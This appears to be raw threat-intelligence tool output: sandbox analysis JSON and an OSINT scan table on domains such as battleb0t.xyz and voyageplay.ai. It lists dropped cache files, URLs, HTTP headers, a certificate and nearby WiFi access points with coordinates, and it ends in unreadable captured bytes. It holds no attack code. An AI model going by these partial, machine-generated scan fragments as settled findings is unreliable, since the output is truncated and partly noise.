"KFOmCnqEu92Fr1Me5g_1_.woff" has type "Web Open Font Format TrueType length 65456 version 1.1"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00001016]\n "particles.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003336]\n "logow_1_.png" has type "PNG image data 432 x 136 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "~DF497BB768EA621C59.TMP" has type "data"- Location: [%TEMP%\\~DF497BB768EA621C59.TMP]- [targetUID: 00000000-00003336]\n "~DF4FA1B0A9F3FF7EDF.TMP" has type "data"- Location: [%TEMP%\\~DF4FA1B0A9F3FF7EDF.TMP]- [targetUID: 00000000-00003336]\n "~DFBC1F098CB0C585CC.TMP" has type "data"- Location: [%TEMP%\\~DFBC1F098CB0C585CC.TMP]- [targetUID: 00000000-00003336]\n "RecoveryStore._3D4AE533-DDC0-11ED-BD38-080027C37619_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_3D4AE535-DDC0-11ED-BD38-080027C37619_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_475EE3B6-DDC0-11ED-BD38-080027C37619_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "script_1_.js" has type "ASCII text"- [targetUID: N/A]\n "VOPKN6EE.htm" has type "HTML document ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\VOPKN6EE.htm]- [targetUID: 00000000-00001016]\n "style_1_.css" has type "ASCII text"- [targetUID: N/A]\n "FSNCEO3Q.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FSNCEO3Q.txt]- [targetUID: 00000000-00003336]\n "FF4BO7D3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FF4BO7D3.txt]- [targetUID: 00000000-00003336]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://traderai.space/"\n Pattern match: "https://traderai.space"\n Pattern match: "MUIDB12A5A57128306EB03399B786297C6F47ieonline.microsoft.com/9216229494092831106132106127659431027661*"\n Pattern match: "SUIDMmicrosoft.com/9216216245171231027778106127659431027661*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "MUID1E300F3F0C876CC339721DC80D036D95msn.com/1025229494092831106132106830784431027661*"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025318836044831063887106783909431027661*"\n Pattern match: "www.msn.com/"\n Pattern match: "C.JgU/0$"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z+N0L0J+0"\n Pattern match: "www.microsoft.com0"\n Pattern match: "http://opensource.org/licenses/MIT/*"\n Heuristic match: "/* Author : Vincent Garreau - vincentgarreau.com"\n Pattern match: "http://opensource.org/licenses/MIT"\n Pattern match: "vincentgarreau.com/particles.js"\n Pattern match: "github.com/VincentGarreau/particles.js"\n Pattern match: "SUIDMmicrosoft.com/9216216245171231027778106127659431027661*MUID12A5A57128306EB03399B786297C6F47microsoft.com/1025229494092831106132106127659431027661*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA6"\n Pattern match: "SUIDMmicrosoft.com/9216216245171231027778106127659431027661*MUID12A5A57128306EB03399B786297C6F47microsoft.com/1025229494092831106132106127659431027661*_EDGE_V1microsoft.com/9216229494092831106132106158909431027661*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "https://fonts.gstatic.com/s/roboto/v30/KFOmCnqEu92Fr1Me5g.woff"\n Pattern match: "https://fonts.gstatic.com/s/roboto/v30/KFOlCnqEu92Fr1MmWUlvAA.woff"\n Pattern match: "https://fonts.googleapis.com"\n Pattern match: "https://fonts.gstatic.com"\n Pattern match: "https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap"\n Pattern match: "https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"\n Pattern match: "https://threejs.org/examples/js/libs/stats.min.js"\n Heuristic match: "cdn.jsdelivr.net"\n Heuristic match: "fonts.googleapis.com"\n Heuristic match: "fonts.gstatic.com"\n Heuristic match: "threejs.org"\n Pattern match: "https://traderai.space/Accept-Language"\n Pattern match: "particles.js/2.0.0/particles.min.js"\n Pattern match: "https://csp.withgoogle.com/csp/apps-themesCross-Origin-Resource-Policy"\n Pattern match: "http://www.windows.com/pctv"\n Pattern match: "http://go.microsoft.com/fwlink/?linkid=53081"\n Pattern match: "www.microsoft.com/extender/help"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=30564-http:// | 185.199.111.153 |
| 2023-05-12 02:45:48 | Physical Location | No | AbstractAPI | 1 | 0 | 2 | 0 | None | Chicago, Illinois, 60666, United States, North America | 104.21.6.166 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 5 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NGMH (Net ID: 00:09:5B:B3:C8:70) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:45:48 | Internet Name | No | VirusTotal | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | kekw.battleb0t.xyz |
| 2023-05-12 02:54:13 | HTTP Status Code | No | Web Spider | 0 | 0 | 3 | 0 | None | 200 | https://ayhu.xyz/cdn-cgi/styles/challenges.css |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 4 | 0 | None | cloudflare | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:26 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
09:cc:cb:40:35:8f:10:16:7b:c7:37:cb:94:7e:31:1a
Signature Algorithm: ecdsa-with-SHA256
Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
Validity
Not Before: Mar 23 00:00:00 2023 GMT
Not After : Mar 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:c7:e0:ee:e2:73:a9:c6:66:6e:30:ed:fc:ae:52:
d4:ca:18:2f:13:3b:72:ab:38:92:54:46:c1:4d:8e:
47:44:3c:fd:42:6f:de:16:4a:26:42:38:ad:e6:91:
f4:0b:0b:51:3f:e6:50:3a:4c:ca:ea:9e:3d:ae:a2:
1a:21:17:88:b9
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F
X509v3 Subject Key Identifier:
ED:98:C9:DB:21:9F:40:A3:B3:0F:A1:47:F2:8D:C0:DD:DA:EB:C7:D1
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz, DNS:sni.cloudflaressl.com
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl
Full Name:
URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt
X509v3 Basic Constraints: critical
CA:FALSE
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA256
30:46:02:21:00:f0:9f:8d:f6:d4:d5:c9:85:3d:e1:3b:e8:89:
39:bb:cd:62:6f:8c:ee:3f:e9:ac:78:6c:9b:85:17:ee:a9:64:
05:02:21:00:e4:53:28:da:31:66:f2:dc:34:6e:1b:42:2d:d7:
79:d3:ee:4b:3d:8a:1c:37:ce:37:5d:dc:4f:bf:b9:94:32:b3
|
| 2023-05-12 03:03:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 002evapey.github.io |
| 2023-05-12 03:10:00 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | shop.telleria.com | 165.232.113.92 |
| 2023-05-12 03:03:22 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 0.church | 0.church |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.84 | 34.74.170.74 |
| 2023-05-12 03:18:06 | URL (Uses Javascript) | No | Page Information | 0 | 0 | 3 | 0 | None | http://oldfluid.battleb0t.xyz | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="Cache-Control" content="no-cache">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="mobile-web-app-capable" content="yes">
<link rel="apple-touch-icon" href="logo.png">
<link rel="icon" href="logo.png">
<title>WebGL Fluid Simulation</title>
<meta name="description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:type" content="website">
<meta property="og:title" content="Webgl Fluid Simulation">
<meta property="og:description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:url" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/">
<meta property="og:image" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/logo.png">
<script type="text/javascript" src="dat.gui.min.js"></script>
<style>
* {
user-select: none;
}
html, body {
overflow: hidden;
background-color: #000;
}
body {
margin: 0;
position: fixed;
width: 100%;
height: 100%;
}
canvas {
width: 100%;
height: 100%;
}
.dg {
opacity: 0.9;
}
.dg .property-name {
overflow: visible;
}
@font-face {
font-family: 'iconfont';
src: url('iconfont.ttf') format('truetype');
}
.bigFont {
font-size: 150%;
color: #8C8C8C;
}
.cr.function.appBigFont {
font-size: 150%;
line-height: 27px;
color: #A5F8D3;
background-color: #023C40;
}
.cr.function.appBigFont .property-name {
float: none;
}
.cr.function.appBigFont .icon {
position: sticky;
bottom: 27px;
}
.icon {
font-family: 'iconfont';
font-size: 130%;
float: right;
}
.twitter:before {
content: 'a';
}
.github:before {
content: 'b';
}
.app:before {
content: 'c';
}
.discord:before {
content: 'd';
}
</style>
</head>
<body>
<canvas></canvas>
<script src="./script.js"></script>
</body>
</html> |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wavelan network (Net ID: 00:02:2D:0D:63:6F) | 34.0544, -118.244 |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c57480ebf7f3732-FRA
Content-Encoding: gzip
| 188.114.96.1 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | DevOps - DevOps is a methodology in the software development and IT industry. Used as a set of practices and tools, DevOps integrates and automates the work of software development and IT operations as a means for improving and shortening the systems development life cycle. | cdn-185-199-111-153.github.com |
| 2023-05-12 02:44:20 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.110.153 |
| 2023-05-12 03:32:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.14:443 | 188.114.97.0/24 |
| 2023-05-12 02:56:33 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'104.196.30.220'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://voyageplay.ai/site.webmanifest', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar32FA.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"104.196.30.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_bf8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_bf8_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_bf8_IESQMMUTEX_0_519"\n "IsoScope_bf8_ConnHashTable<3064>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_bf8_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "IsoScope_bf8_IE_EarlyTabStart_0xb78_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3064"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3064"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "Cab32F9.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002976]\n "~DF0102A8D036D93BAD.TMP" has type "data"- Location: [%TEMP%\\~DF0102A8D036D93BAD.TMP]- [targetUID: 00000000-00003064]\n "~DF6DA11E7760B49E9F.TMP" has type "data"- Location: [%TEMP%\\~DF6DA11E7760B49E9F.TMP]- [targetUID: 00000000-00003064]\n "RecoveryStore._D53E7D97-1CF4-11ED-96A5-080027F708E5_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Tar32FA.tmp" has type "data"- Location: [%TEMP%\\Tar32FA.tmp]- [targetUID: 00000000-00002976]\n "J0CXAHLN.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J0CXAHLN.txt]- [targetUID: 00000000-00003064]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003064]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002976]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00003064]\n "9F4E7D2B4E1791C98BAE1536D04998B0" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\9F4E7D2B4E1791C98BAE1536D04998B0]- [targetUID: 00000000-00002976]\n "RM4WKYJ5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RM4WKYJ5.txt]- [targetUID: 00000000-00003064]\n "_593C2B6E-1CF7-11ED-96A5-080027F708E5_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Cab32F9.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\Cab32F9.tmp]- [targetUID: 00000000-00002976]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00003064]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003064]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /site.webmanifest HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: voyageplay.ai\nConnection: Keep-Alive\nAccept-Language: en-US"- [Source: SSL_104.196.30.220]\n\n "HTTP/1.1 200 OK\nAccept-Ranges: bytes\nAge: 11496\nCache-Control: public, max-age=0, must-revalidate\nContent-Length: 360\nContent-Type: application/octet-stream\nDate: Mon, 15 Aug 2022 22:26:27 GMT\nEtag: "03ac729a0a20f0fa736f8d32597e40d7-ssl"\nServer: Netlify\nStrict-Transport-Security: max-age=31536000\nX-Nf-Request-Id: 01GAJ4SY0PCVKT6ZTGE83ZQNQ2\n\n{\n "name": "",\n "short_name": "",\n "icons": [\n {\n "src": "/android-chrome-192x192.png",\n "sizes": "192x192",\n "type": "image/png"\n },\n {\n "src": "/android-chrome-512x512.png",\n "sizes": "512x512",\n "type": "image/png"\n }\n ],\n "theme_color": "#ffffff",\n "background_color": "#ffffff",\n "display": "standalone"\n}"- [Source: SSL_104.196.30.220]\n\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: voyageplay.ai\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_104.196.30.220]\n\n "-,,-,,-,,-,,-,,-,,-,,-,,-,,100ONNxwwxwwONN100-,,-,,-,,-,,-,,-,,-,,-,,-,,\'\'\'\n,,,-,,-,,-,,-,,-,,-,,-,,211ttttss211-,,-,,-,,-,,-,,-,,-,,,,,))),,,-,,-,,-,,-,,-,,-,,?>>???-,,-,,-,,-,,-,,-,,,++)))-++-,,-,,-,,-,,-,,-,,????>>-,,-,,-,,-,,-,,-,,-++"""-\n\n-\n\n-\n\n-\n\n-\n\n-\n\n211yxxXWWXWWyxx100-\n\n-\n\n-\n\n-\n\n-\n\n-\n\n""")))J,++-,,-,,-,,-,,-,,tttwvv0//-,,-,,-,,-,,0//wvvsss-,,-,,-,,-,,-,,-,,***I-++-,,-,,-,,-,,-,,100wvv-,,-,,-,,-,,-,,-,,-,,-,,wvv100-,,-,,-,,-,,-,,+++,++-,,-,,-,,-,,-,,ONN0//-,,-,,100ZYYZYY100-,,-,,0//ONN-,,-,,-,,-,,-,,,++-,,-,,-,,-,,-,,-,,xwwyxx-,,-,,100100-,,-,,yxxwww-,,-,,-,,-,,-,,-,,,++-,,-,,-,,-,,-,,XWW-,,-,,ZYYZYY-,,-,,VUU-,,-,,-,,-,,-,,,++,++-,,-,,-,,-,,-,,XWW-,,-,,ZYYZYY-,,-,,.--4444334330//-,,-,,-,,-,,-,,,++-,,-,,-,,-,,-,,-,,xwwyxx-,,-,,100100-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,,++-,,-,,-,,-,,-,,ONN0//-,,-,,100ZYYZYY100-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,,++-++-,,-,,-,,-,,-,,100wvv-,,-,,-,,-,,-,,-,,-,,-,,-,,-"- [Source: SSL_104.196.30.220]\n\n ",,-,,-,,-,,-,,-,,-,,-,,-,,-,,+++)))J,++-,,-,,-,,-,,-,,tttwvv0//-,,-,,-,,-,,/...---,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,***I"""-\n\n-\n\n-\n\n-\n\n-\n\n-\n\n211yxxXWW\\[[{{{zyy-\n\n-\n\n-\n\n-\n\n-\n\n-\n\n-\n\n-\n\n-\n\n-\n\n-\n\n"""-++,..&EF!\\]$OP+11-,,???<;;-,,-,,-,,-,,-,,-,,-,,-,,-,,-++A 